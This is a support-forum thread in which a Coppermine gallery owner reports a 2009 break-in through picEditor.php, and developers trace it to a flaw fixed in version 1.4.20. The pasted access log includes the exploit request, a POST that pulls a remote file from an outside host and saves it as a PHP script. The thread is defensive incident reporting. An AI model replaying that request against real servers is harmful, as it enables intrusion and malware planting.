[Solved]: HACK: PHP Script Upload via picEditor.php [Solved]: HACK: PHP Script Upload via picEditor.php
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

[Solved]: HACK: PHP Script Upload via picEditor.php

Started by Anderl, April 22, 2009, 01:08:31 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Anderl

Hi,

today (22nd of April - Germany) at early morning was somebody able to upload and to execute a php script by using the picEditor.php

Below is the code. The 65.. IP is the original IP from where the script was executed. xx is my server IP.

65.182.208.101 - - [22/Apr/2009:04:40:37 +0200] "GET /gallery/picEditor.php HTTP/1.1" 200 8746 "-" "-"
65.182.208.101 - - [22/Apr/2009:04:40:41 +0200] "POST /gallery/picEditor.php?img_dir=http://ftp.tavr.kiev.ua/auto.txt&CURRENT_PIC[filename]=/9.php HTTP/1.1" 200 13249 "-" "-"
xx.xx.xx.xx - - [22/Apr/2009:04:40:44 +0200] "GET /forum/styles/AZ_ClassyDark/theme/core13046.php HTTP/1.0" 200 23064 "-" "-"
xx.xx.xx.xx - - [22/Apr/2009:04:40:44 +0200] "GET /gallery/themes/rainy_day/images/core13404.php HTTP/1.0" 200 68526 "-" "-"
xx.xx.xx.xx - - [22/Apr/2009:04:40:45 +0200] "GET /forum/styles/subsilver2/theme/images/core15355.php HTTP/1.0" 200 45790 "-" "-"
xx.xx.xx.xx - - [22/Apr/2009:04:40:45 +0200] "GET /cgi-bin/core13199.php HTTP/1.0" 200 17979 "-" "-"
xx.xx.xx.xx - - [22/Apr/2009:04:40:45 +0200] "GET /forum/styles/xandgrey/imageset/contrib/core16072.php HTTP/1.0" 200 23623 "-" "-"
65.182.208.101 - - [22/Apr/2009:04:40:45 +0200] "GET /gallery/albums/9.php HTTP/1.1" 200 632 "-" "-"


A file named 9.php was created (in main directory) and executed. With this file they created files which including a Trojan. All files are start with: core*****.php - **** is a 5 digit random number.
One core file was stored in the cgi-bin directory of the main path. Several others are store (I guess) by random access to other directories on server.

They even create a .htaccess file (I found it in the userpics directory) which redirect all image path from the main website to google.com...
I don't know why they make this redirection...
But only with that I saw that something is wrong in the gallery, because no images are shown.
If they don't made this redirection... I think I don't will find out whats happened on my server. So it seems they made a mistake which was good for me.

I had a talk with my provider. He guess that my website should only be used to download the Trojan by using iframes on other (hacked) websites. So finally my website should only be the "download area" for the Trojan...

I recommend to all gallery users to check the installed galleries!

Also Important: I even found a php file called S.php in the include folder of the gallery. It was uploaded earlier. Unfortunately I haven't the log files anymore. In S.php is a code inside (it seems to send e-mail with maybe a virus), but my virus scanner keep silence... I sent this file to avira for an analysis. But in anyway, this file is not a coppermine file.

I hope with this info it is possible to remove the security vulnerability and to prevent other coppermine users.

Regards

Anderl


Hein Traag

Which version of cpg were you using? Did you read the Yikes sticky thread?

François Keller

Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

Anderl

... I just checked it. It is 1.4.19...
I tried to find some topics about attacks vie picEditor.php but I found only some old posts. Thats why I posted the new one.

I modified the gallery to use it with 3D (stereo) Video clips. So finally if you click on an image then a file opened with the extension 3dccpl. This file is connected with a 3D Videoplayer and open a wmv file in the 3D player.

The modifications are made in some php files and my problem is that an update will overwrite the files. Is it possible just to install a new picEditor.php with the security changes, if they are made?

Anderl

P.S.

I have read the Yicks sticky thread. Of course I had a backup and the site is clean and running again. I just removed the picEditor.php until the problem is solved. I am not a beginner but of course I am not a specialist for hacker attacks. So I really have to know if the problem will be solved with an update or not. In general the gallery is controlled only from me and no user registration possible, so I do not need the normal user functions.

Maybe someone can explain me the "post" option which is shown above in the code? Is the "9.php" created with this function call or is it possible that the file already exisits before?

Thank you

Anderl



Hein Traag

1.4.19 is your problem.. it has a security flaw which was fixed by 1.4.20 and 1.4.21

If you want your site cleaned use the Yikes thread and once you are done with that try and check regularly for updates.

Anderl

Thank you very much!

I installed 1.4.21 and made again my changes in the php files that it is possible to open the 3D Videos with the 3D Player. Fortunately I made changes only in 3 files and the style.css. :)

I also tried to upload and rename a text file like shown in the code above.
Now it returns with a missing parameter message. Good :)

I really tried to find a thread with the problem about the old picEditor.php. I can't find it. I used simply "piceditor.php" in the forum search... Maybe you can combine the possible hacks with the name of php files in one thread? This would be more easy.

In anyway, Thanks again and I think that maybe now some more people will make an update immediately... ;)

Regards

Anderl


Joachim Müller

Installing the new version is not enough to sanitize your already-infected gallery. Hence the suggestion to read the Yikes thread and do as suggested there.

Anderl

Hi Joachim,

I wrote before that I read the Yikes thread. It is useful, but I use a professional webspace. It means I pay a bit more, but I have a lot more of functions and possibilities. I even wrote that I had (my provider) a clean backup.

This backup (function) don't overwrite files. The server is shut down, then all (and I mean all) files, folders etc. are deleted and then the server is installed again with the backup files, because as you can see in the code above, the infected files (core*****.php) are stored in several folders and not in the gallery.

After the backup I installed the new version of the gallery and checked the picEditor.php if I can upload a txt file and store it with php extension. It doesn't work. So this security vulnerability is really fixed.

I also create now a .htaccess file with IP's which are on a black list (like spamhaus.org). All listed IP's are refused from access to the website. Maybe you support a black list too? I mean that you create a thread with the known IP's from Hackers and Spammers which could be easily (copy and paste) inserted into a .htaccess file. I think it is in your interest too, to make the coppermine gallery as save as possible.

If you agree, I can publish my collection :) of black IP's. Or I can publish the whole .htaccess file.

Regards

Anderl



Joachim Müller

I can't see how a blacklist is suppossed to prevent hacking.

Anderl

???

It is not the black list! It is the .htaccess file with the IP's inside. If you have a look for example to

http://www.projecthoneypot.org/list_of_ips.php

then you will see that many IP's are used for a longer time, because very often the attack come over an already hacked network or server.

The listing of black IP's is very quickly now. It need only hours to find them in the black lists after the first attack or spaming. It is only a question how often you check this lists and how often you actualize the htaccess file.

It was just an idea, a suggestion to offer an additional prevention of attacks. I do and did it in anyway on my server.

Anderl

Small Update:

I wrote in my first posting about the file S.php. I've sent this file to Avira for an analysis. Here is the result. It is a new Malware!

S.php  112.06 KB  MALWARE
Name (given from Avira) PHP/Roxprov.A
It is a PHP-Script-Virus.
Detection will be included to one of the next Updates from the VDF file from Avira.

Regards

Anderl

Hein Traag